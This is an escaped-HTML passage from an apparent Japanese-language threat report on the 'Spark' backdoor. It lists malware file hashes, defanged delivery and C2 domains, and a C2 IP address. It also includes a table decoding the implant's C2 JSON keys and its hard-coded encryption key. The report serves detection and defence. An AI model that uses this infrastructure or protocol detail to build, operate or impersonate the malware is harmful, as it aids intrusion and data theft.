\u0627\u0644\u064a\u0648\u0645\u064a \u062d\u0648\u0644 \u0623\u062e\u0631 \u0645\u0633\u062a\u062c\u062f\u0627\u062a \u0627\u0644\u0625\u0631\u0647\u0627\u0628 \u0627\u0644\u0639\u0627\u0644\u0645\u064a- 9 \u2013 9 \u2013 2019.doc (Daily updates on the latest terrorism report Alaalmi- 9 \u2013 9 \u2013 2019.doc)<\/li>\n<li>243f1301d1d759c17cd49336512ebceb9d347995c90a6e00aff926439d63f12d \u2013 Daily Report.rar<\/li>\n<li>602828399e24dca9259a4fc4c26f07408d1e0a638c015109c6c84986dc442ebb<\/li>\n<li>eaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000<\/li>\n<li>273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f<\/li>\n<li>71ea0ba573451b14bb411ad28e5aac883f8af0376db8c9d34f309778c901c5d6<\/li>\n<li>a0ae5cc0659693e4c49d3597d5191923fcfb54040b9b5c8229e4c46b9330c367<\/li>\n<li>8c0966c9518a7ec5bd1ed969222b2bcf9420295450b7ed2f45972e766d26ded8<\/li>\n<li>7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128<\/li>\n<li>64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431<\/li>\n<li>e8d73a94d8ff18c7791bf4547bc4ee2d3f62082c594d3c3cf7d640f7bbd15614<\/li>\n<li>6e60f5c65299ee7f7b257f5c83d3bb36154654b26e721136f7184514fcf6b296<\/li>\n<li>b08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca<\/li>\n<li>a6e0297777ba29e21e5d1acca6210d436eee5c2b93d2dec27910ffd6e2266559<\/li>\n<li>6e896099a3ceb563f43f49a255672cfd14d88799f29617aa362ecd2128446a47<\/li>\n<li>cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551<\/li>\n<li>92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7<\/li>\n<li>5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3<\/li>\n<li>89acce7cdd354a04f2edd4a2226caf5c47246a8196ec1d9b98159da38ec20c24<\/li>\n<li>b654dd768912e09b9c71eb388995b1d69b5baa45e970a6afc42733d647220712<\/li>\n<li>daa72ba2b9525d74e0a3564d0d72e06eed27d04ce63fe98c45b1e84cee09987c<\/li>\n<li>c39e3adb6e15b9964bf0f9702b632086951b4ed9f9fb9cadd6975962a031a398<\/li>\n<li>255a29f88150285a9553f67a6475dc50fcbb5fc737a0178cc0e737d49c8d1b20<\/li>\n<li>4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85<\/li>\n<li>23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c<\/li>\n<li>75336b05443b94474434982fc53778d5e6e9e7fabaddae596af42a15fceb04e9<\/li>\n<li>9a3ec0a8b2a88106fc537d9cae1989f6fba36bb43352a944d2031e7b2ab7673c<\/li>\n<li>89d7337ac102cd80316ad59a1dcfcc5c7849d0e7520f0f85e1781574423e38ea<\/li>\n<li>19ede61c865a3cdd59d3a5d1a79b7ce83ca7828a6b80a2f968d82b5b56a8603c<\/li>\n<li>f9df76f634586c698b967209d83834b98ff3d245d47d6993bfb27a0aa819d9b9<\/li>\n<li>704b19e0460a0fa7d952ba6feb5eadb9054895d1d753df72faf6f470446a0519<\/li>\n<li>194c236a3eed81f3180bdcc5bcbd29b782b1a0ef7962ceb1c4cb892a427563ff<\/li>\n<li>fc420a49b1e9e2200238a4846110c2e4e63bfe6d7088645f49ebb65718a70b7f<\/li>\n<li>bc9353adc58b983b080b61950fc6689ee340797458fc4fd8a1d6f492976aa0e2<\/li>\n<li>8c6dc796b35ef405c42c78e1011cc4a6df09315264d638271cb0674d044886cf<\/li>\n<li>9d49020debdc6ab63de249fd9289d51415395fc8b1e8a15a82f200bf90e674ee<\/li>\n<li>5b6e43d434148bfcf52fd441f64836ae35f4f0ed9d75bf9707f521bcbb7c0380<\/li>\n<li>3a32c81ec609a5466f050c09156f25b5561c691763f865ee437e95a246dcbbe1<\/li>\n<li>c3e23a42dc49b039828da6cef4ebb7226c85163651a69085ee7e1899aa804fed<\/li>\n<li>26b032a9b6a22047eb48f1fb1553827a5b85aa7229422d650fa1f37c48b3aeb1<\/li>\n<li>8e5bf597948ea6ad39f0030053978d1a14e1c3dbb4abf044a223e14544c73b7f<\/li>\n<li>1513032544512718d068b2f6e8b5087cae9fc446e40cd56c03ab7bbbe047add5<\/li>\n<li>d04276760d722c241e831dacee7cf9d63cb123ce7188d604df1c56c1197d7160<\/li>\n<li>83750372d4e8c043d6f916ec398303dc929b59e05b7f5a9dc5485e4530047f4a<\/li>\n<li>23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c<\/li>\n<li>bf4cdb277881754db2f44a014c08ce1857c9c0c47c6c1c8582782b5c887241e2<\/li>\n<li>58376e763ef0ca9dccad55e043794b5ec0b34c8c2a20604cff0b26f216e3c1e2<\/li>\n<li>399344aa609f17e558356709a398b4478e5c737c7cc843e3d111d33192c35e5a<\/li>\n<li>1c43f8f68f7b8e40828f9f74566860b25a5dfd9b7f8b7620d71644866e6cb19d<\/li>\n<li>ab2335ba3abe97a02a3a2d1b063a08ae649406f88d4cf02d22d724e649b9e7be<\/li>\n<li>a4c6aea61953d515d38d75ae7b3ef2a37bb26d1f838722f0a67624d6a728549e<\/li>\n<li>51c1e6ce3ff1f42734bfa19a7142b5154172232afc5528dad4c527df3a44c0c1<\/li>\n<li>329e9e98f08f3d6a017254dd033984cfd6421ccab5b323ebace5d68662a98a09<\/li>\n<li>0631ed0995e21ec8f02f6167824eca92e84abfd8cf4dbbd9c7c88f88d4f570cd<\/li>\n<li>d010ef2b6664779b3c8cfa0a5179b7331d88d34d04350ebeeecb3bae65654393<\/li>\n<li>4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85<\/li>\n<li>51042cac30b4d6072f79b3f9b27d8ee7b65f438549c90f57dc5fecc17d35054a<\/li>\n<li>ec0d30d2fdd301bf0cfe66028c9a37d5535a8161909d0d3573447d1843f61c97<\/li>\n<li>e6e5593cbac23ec5c51e5f63c4c6616a8eb71697a89f9d1d17cc7be91c36e3e9<\/li>\n<li>36166db096ddb50af4f5c4be48b4274c535f40c74ce3450d4ad3bdaa2c28beb3<\/li>\n<li>966ad6452793b1562f0081456a951d3310d4e7690fa74ef8ff4046778bd37168<\/li>\n<li>b2437a54195d51435ad07867a5cb069e831fdd8e48bb70daa3894fde40754bc8<\/li>\n<li>fe19ab4fd65531163d197d565201c2afea7d9f8e74e5f75c714eb5fe086a02fd<\/li>\n<li>212aa6e3f236550bb4b9328071ee4f0e8a74465c75dcf1e6cde8502afde91364<\/li>\n<li>e489e5297ed8cf594c2a5160eff79b12b9ee68e36e0d00ed31f44b75c4a38f61<\/li>\n<li>0eebc31bb64ba0aa0ea335a5f35392ff1d058e97bf5cb5b46d7a89b197dcba7a<\/li>\n<li>fe0f23d6675260dd40f277906aa3dd34cbef2243336334dda10ad4500f8e6883<\/li>\n<li>7c5a9ce04002be953c556b5b50c10f8d462abc92d1ffe28a325d7ea741701be1<\/li>\n<li>45a2c50edd710476e0de8ece6cc5931035ce8183ac4cf521d494d94744d44c2c<\/li>\n<li>b84f2497e4cfeac240b1815b22741609e5a31f0be11667a3c7256c16788728ec<\/li>\n<li>78696cf4370817cb0ffd6930a92553d3551fe77cdc6d45638ddd13f05b9218b8<\/li>\n<li>5109f2c8f014698f1d2f0d59a7c9cc1cd9400a6fe4dcde95cc475f453e74bc6e<\/li>\n<li>ab4e43b4e526d44bf12ae5113184afdf5c15630808f674f5e1a472eb6811ce3f<\/li>\n<li>daa72ba2b9525d74e0a3564d0d72e06eed27d04ce63fe98c45b1e84cee09987c<\/li>\n<li>64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431<\/li>\n<li>6e60f5c65299ee7f7b257f5c83d3bb36154654b26e721136f7184514fcf6b296<\/li>\n<li>B08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca<\/li>\n<li>cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551<\/li>\n<li>9511940ed52775aef969fba004678f4c142b33e2dd631a0e8f4e536ab0b811db<\/li>\n<li>e3779f6252ca606ace9ae06623ba086d1a441582b625e433799260d71cdb1b4b<\/li>\n<li>e6e9f7b0449976537d9276192e5767c9909cd34df028a8bf1cac3dbe490f0e73<\/li>\n<li>69df8e4bdc3fd69deb6c866254f80f6288549222ed0d07ccd4c05597e75414df<\/li>\n<li>40b7a1e8c00deb6d26f28bbdd3e9abe0a483873a4a530742bb65faace89ffd11<\/li>\n<\/ul>\n<h3><a id=\"post-105222-related-delivery-domains\"><\/a>\u95a2\u9023\u3059\u308b\u914d\u4fe1\u7528\u30c9\u30e1\u30a4\u30f3<\/h3>\n<ul>\n<li>servicebios[.]com<\/li>\n<li>dapoerwedding[.]com<\/li>\n<li>zmartco[.]com<\/li>\n<\/ul>\n<h3><a id=\"post-105222-spark-c2-domains\"><\/a>Spark C2\u306e\u30c9\u30e1\u30a4\u30f3<\/h3>\n<ul>\n<li>webtutorialz[.]com<\/li>\n<li>nysura[.]com<\/li>\n<li>laceibagrafica[.]com<\/li>\n<li>motoqu[.]com<\/li>\n<li>smartweb9[.]com<\/li>\n<li>laptower[.]com<\/li>\n<li>app.msexchanges16[.]com<\/li>\n<li>msexchange13[.]com<\/li>\n<li>cloudserviceapi[.]online<\/li>\n<li>updates.masterservices[.]online<\/li>\n<li>clients.itresolver[.]online<\/li>\n<li>update.itresolver[.]online<\/li>\n<li>91.219.237[.]99<\/li>\n<li>goldenlines[.]site<\/li>\n<li>Update.nextdata[.]site<\/li>\n<\/ul>\n<h2><a id=\"post-105222-post-105134-_4eh4ko1eun25\"><\/a><a id=\"post-105222-spark-first-names-and-more\"><\/a>Spark\u306e\u540d\u524d\u3068\u8a73\u7d30<\/h2>\n<table>\n<tbody>\n<tr>\n<td><strong>\u5fa9\u53f7\u3055\u308c\u305f\u6587\u5b57\u5217<\/strong><\/td>\n<td><strong>\u7528\u9014<\/strong><\/td>\n<td><strong>\u8aac\u660e<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Lawrence<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>Ivory\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u542b\u307e\u308c\u308b\u30bf\u30b9\u30af\u756a\u53f7\u306e\u5024\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea(JaseN)\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Allier<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u7528\u9014\u304c\u4e0d\u660e\u3060\u304c\u3001MorganE\u901a\u4fe1\u30bf\u30a4\u30d7\u306b\u5bfe\u3059\u308b\u5fdc\u7b54\u3068\u3057\u3066\u4e88\u671f\u3055\u308c\u3066\u3044\u308b\u6570\u5024\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>JaseN<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>MorganE\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea\u306e\u30ea\u30b9\u30c8\u306e\u305f\u3081\u306e\u30ad\u30fc\u540d\u3001\u53d7\u4fe1\u3057\u305f\u30bf\u30b9\u30af\u756a\u53f7\u3092\u8868\u3059<\/td>\n<\/tr>\n<tr>\n<td>Ivory<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u30bf\u30b9\u30af\u756a\u53f7\u3068\u601d\u308f\u308c\u308b\u6570\u5024\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308bJordanlzw\u30ea\u30b9\u30c8\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Jonas<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u7406\u7531\u306f\u4e0d\u660e\u3060\u304c\u3001\u30d6\u30fc\u30eb\u5024\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308bJordanlzw\u30ea\u30b9\u30c8\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Reginacy<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u30d7\u30ed\u30bb\u30b9\u3092\u4f5c\u6210\u305b\u305a\u306b\u5358\u306b'ok'\u3092C2\u306b\u9001\u4fe1\u3059\u308b\u305f\u3081\u306e\u30d6\u30fc\u30eb\u5024\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308bJordanlzw\u30ea\u30b9\u30c8\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>TrumanRd<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3067\u5b9f\u884c\u3055\u308c\u308b\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308bJordanlzw\u30ea\u30b9\u30c8\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Alanih<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u5b9f\u884c\u3059\u308b\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308bJordanlzw\u30ea\u30b9\u30c8\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Averizt<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u30d0\u30a4\u30ca\u30ea\u5185\u306b\u30cf\u30fc\u30c9\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3055\u308c\u3066\u3044\u308bVanessaFM\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\u6570\u5024\u3092\u4fdd\u5b58\u3059\u308b\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>MathiasNbo<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>VanessaFM\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea\u306e\u30ea\u30b9\u30c8\u306e\u305f\u3081\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>BrandentlK<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u69cb\u6210\u5185\u306b\u30cf\u30fc\u30c9\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3055\u308c\u305fVanessaFM\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\u6570\u5024\u3092\u4fdd\u5b58\u3059\u308b\u30ad\u30fc\u540d\u3002<\/td>\n<\/tr>\n<tr>\n<td>AdalynngS<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u76ee\u7684\u4e0d\u660e\u306e\u6570\u5024\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea(MathiasNbo)\u306e\u30ad\u30fc\u540d\u3002<\/td>\n<\/tr>\n<tr>\n<td>AdelineRD<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>VanessaFM\u901a\u4fe1\u30bf\u30a4\u30d7\u3067C2\u306b\u9001\u4fe1\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u69cb\u6210\u304b\u3089\u53d6\u5f97\u3057\u305fbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3066\u6697\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217\u3092\u4fdd\u5b58\u3059\u308b\u30ad\u30fc\u540d\u3002\u30cb\u30c3\u30af\u30cd\u30fc\u30e0\u307e\u305f\u306f\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\/\u30da\u30a4\u30ed\u30fc\u30c9\u8b58\u5225\u5b50\u3068\u8003\u3048\u3089\u308c\u3066\u3044\u308b\u3002<\/td>\n<\/tr>\n<tr>\n<td>CollinsPM<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>UUID\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea(MathiasNbo)\u306e\u30ad\u30fc\u540d\u3002ZaydenlnL\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u3082\u3042\u308b\u3002<\/td>\n<\/tr>\n<tr>\n<td>Nevaeh<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u76ee\u7684\u4e0d\u660e\u306e\u30d6\u30fc\u30eb\u5024\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea(MathiasNbo)\u306e\u30ad\u30fc\u540d\u3002<\/td>\n<\/tr>\n<tr>\n<td>LondonzO<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u6307\u5b9a\u3055\u308c\u305f\u30d7\u30ed\u30bb\u30b9\u3092\u4f5c\u6210\u3057\u3001\u623b\u308a\u3092\u5f85\u3064\u305f\u3081\u306e\u30d6\u30fc\u30eb\u5024\u306e\u4fdd\u5b58\u306b\u4f7f\u7528\u3055\u308c\u308bJordanlzw\u30ea\u30b9\u30c8\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>JoslynKe<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u306e\u9001\u4fe1\u3092\u8868\u3059ReeceWNM\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u5024<\/td>\n<\/tr>\n<tr>\n<td>AngelxEv<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u60c5\u5831\u30bf\u30a4\u30d7\u306e\u5024(1 = UUID\u30012 =\u30db\u30b9\u30c8\u540d\u30013 =\u30e6\u30fc\u30b6\u30fc\u540d)\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea(Maximiliano)\u5185\u3067\u4f7f\u7528\u3055\u308c\u308b\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>ZaydenlnL<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>AngelxEv\u3067\u6307\u5b9a\u3055\u308c\u3066\u3044\u308b\u30bf\u30a4\u30d7\u3068\u95a2\u9023\u3059\u308b\u30c7\u30fc\u30bf\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea(Maximiliano)\u5185\u3067\u4f7f\u7528\u3055\u308c\u308b\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Houstonod<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u76ee\u7684\u4e0d\u660e\u306e\u5024\"1\"\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea(Maximiliano)\u5185\u3067\u4f7f\u7528\u3055\u308c\u308b\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Maximiliano<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea\u306e\u30ea\u30b9\u30c8\u3092\u4fdd\u5b58\u3059\u308bJoslynKe\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Garrison<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u304a\u305d\u3089\u304f\u8ffd\u52a0\u306e\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u9001\u4fe1\u3059\u308b\u524d\u306e\u30b9\u30ea\u30fc\u30d7\u9593\u9694\u3068\u3057\u3066\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u3088\u3063\u3066\u4f7f\u7528\u3055\u308c\u308b\u6570\u5024\u306e\u305f\u3081\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Zeke<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>Winston\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea\u306e\u30ea\u30b9\u30c8\u306e\u305f\u3081\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>ReesefP<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u30bf\u30b9\u30af\u756a\u53f7\u3092\u8868\u3059\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308bZeke\u914d\u5217\u5185\u306e\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea\u5185\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>FrederickT<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u30bf\u30b9\u30af\u306e\u305f\u3081\u306b\u5b9f\u884c\u3055\u308c\u305f\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u4fdd\u5b58\u3059\u308bZeke\u914d\u5217\u5185\u306e\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea\u5185\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>KaileeXws<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u5b9f\u884c\u304c\u6210\u529f\u3057\u305f\u5834\u5408\u306b\u30d6\u30fc\u30eb\u5024\u3092\u683c\u7d0d\u3059\u308bZeke\u914d\u5217\u5185\u306e\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea\u5185\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>EverlyY<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u6307\u5b9a\u3055\u308c\u305f\u79d2\u6570\u306e\u9593\u30a2\u30a4\u30c9\u30eb\u72b6\u614b\u306b\u3059\u308b\u305f\u3081\u306b\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u3088\u3063\u3066\u4f7f\u7528\u3055\u308c\u308b\u6570\u5024\u306e\u305f\u3081\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>CallieVK<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u901a\u4fe1\u3055\u308c\u305f\u30c7\u30fc\u30bf\u306e\u4fdd\u5b58\u306b\u4f7f\u7528\u3055\u308c\u308b\u3001C2\u306b\u9001\u4fe1\u3055\u308c\u308bJSON\u5185\u306e\u30d5\u30a3\u30fc\u30eb\u30c9<\/td>\n<\/tr>\n<tr>\n<td>ReeceWNM<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\u4fdd\u5b58\u306b\u4f7f\u7528\u3055\u308c\u308b\u3001C2\u306b\u9001\u4fe1\u3055\u308c\u308bJSON\u5185\u306e\u30d5\u30a3\u30fc\u30eb\u30c9<\/td>\n<\/tr>\n<tr>\n<td>MorganE<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u95a2\u9023\u3059\u308b\u30c7\u30fc\u30bf\u3092\u9001\u4fe1\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u30bf\u30b9\u30af\u756a\u53f7\u3092\u8868\u3059ReeceWNM\u30d5\u30a3\u30fc\u30eb\u30c9\u5185\u306e\u5024<\/td>\n<\/tr>\n<tr>\n<td>Winston<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u7d50\u679c\u306e\u9001\u4fe1\u3092\u8868\u3059ReeceWNM\u30d5\u30a3\u30fc\u30eb\u30c9\u5185\u306e\u5024<\/td>\n<\/tr>\n<tr>\n<td>Jessicay<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u30d3\u30fc\u30b3\u30f3\u3092\u8868\u3059ReeceWNM\u30d5\u30a3\u30fc\u30eb\u30c9\u5185\u306e\u5024<\/td>\n<\/tr>\n<tr>\n<td>VanessaFM<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089)<\/td>\n<td>\u8ffd\u52a0\u306e\u30bf\u30b9\u30af\u306e\u8981\u6c42\u3092\u8868\u3059ReeceWNM\u30d5\u30a3\u30fc\u30eb\u30c9\u5185\u306e\u5024<\/td>\n<\/tr>\n<tr>\n<td>rEA8GPZf4oIdOsjMxgFD<\/td>\n<td>\u30ad\u30fc<\/td>\n<td>C2\u306b\u9001\u4fe1\u3055\u308c\u308bJSON\u5185\u306e\u3001\u53ce\u96c6\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u306a\u3069\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u6697\u53f7\u5316\u306b\u4f7f\u7528\u3055\u308c\u308b<\/td>\n<\/tr>\n<tr>\n<td>Jordanlzw<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>\u5b9f\u884c\u3059\u308b\u30b3\u30de\u30f3\u30c9\u3092\u4fdd\u5b58\u3059\u308b\u30c7\u30a3\u30af\u30b7\u30e7\u30ca\u30ea\u306e\u30ea\u30b9\u30c8\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>Aryana<\/td>\n<td>C2\u30c1\u30e3\u30cd\u30eb(C2\u304b\u3089)<\/td>\n<td>Jordanlzw\u30ea\u30b9\u30c8\u306b\u4fdd\u5b58\u3055\u308c\u3066\u3044\u308b\u3001\u5b9f\u884c\u3059\u308b\u30b3\u30de\u30f3\u30c9\u306e\u6570\u306e\u6307\u5b9a\u306b\u4f7f\u7528\u3055\u308c\u308b\u6570\u5024\u306e\u305f\u3081\u306e\u30ad\u30fc\u540d<\/td>\n<\/tr>\n<tr>\n<td>24<\/td>\n<td>\u69cb\u6210<\/td>\n<td>C2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30e1\u30c3\u30bb\u30fc\u30b8\u9593\